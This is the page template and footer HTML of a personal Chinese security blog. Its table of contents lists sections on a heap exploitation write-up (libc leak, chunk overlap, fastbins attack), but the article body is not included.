            <a class="level-item button is-white is-marginless" target="_blank"
                title="Github" href="https://github.com/P1ay2win/">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Twitter" href="https://twitter.com/p1ay2win">
                
                <i class="fab fa-twitter"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="RSS" href="/atom.xml">
                
                <i class="fas fa-rss"></i>
                
            </a>
            
        </div>
        
    </div>
</div>

    
        

    <div class="card widget column-left is-sticky" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    目录
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#前言">
        <span class="has-mr-6">1</span>
        <span>前言</span>
        </a></li><li>
        <a class="is-flex" href="#存在的漏洞">
        <span class="has-mr-6">2</span>
        <span>存在的漏洞</span>
        </a></li><li>
        <a class="is-flex" href="#利用过程">
        <span class="has-mr-6">3</span>
        <span>利用过程</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#0x0-leak-libc-address和heap-address">
        <span class="has-mr-6">3.1</span>
        <span>0x0 leak libc address和heap address</span>
        </a></li><li>
        <a class="is-flex" href="#0x01-chunk-overlap">
        <span class="has-mr-6">3.2</span>
        <span>0x01  chunk overlap</span>
        </a></li><li>
        <a class="is-flex" href="#0x02-fastbins-attack">
        <span class="has-mr-6">3.3</span>
        <span>0x02 fastbins attack</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#贴上exp">
        <span class="has-mr-6">4</span>
        <span>贴上exp</span>
        </a></li><li>
        <a class="is-flex" href="#后记">
        <span class="has-mr-6">5</span>
        <span>后记</span>
        </a></li><li>
        <a class="is-flex" href="#参考">
        <span class="has-mr-6">6</span>
        <span>参考</span>
        </a></li></ul>
            </div>
        </div>
    </div>


    
    
        <div class="column-right-shadow is-hidden-widescreen ">
        
        </div>
    
</div>


                

            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    P1ay2win&#39;s blog
                
                </a>
                <p class="is-size-7">
                &copy; 2022 P1ay2win&nbsp;
                <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>访问量<span id="busuanzi_value_site_pv"></span>次  <i class="fa fa-user-md"></i>  访客数<span id="busuanzi_value_site_uv"></span>人<br>
                Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://p1ay2win.github.io">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
<script src="/js/animation.js"></script>

    
    
<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>

    
    
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>

    
    <script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>
    
    
<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>

    
    
    
    
    
    
    
    
    
    
    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>
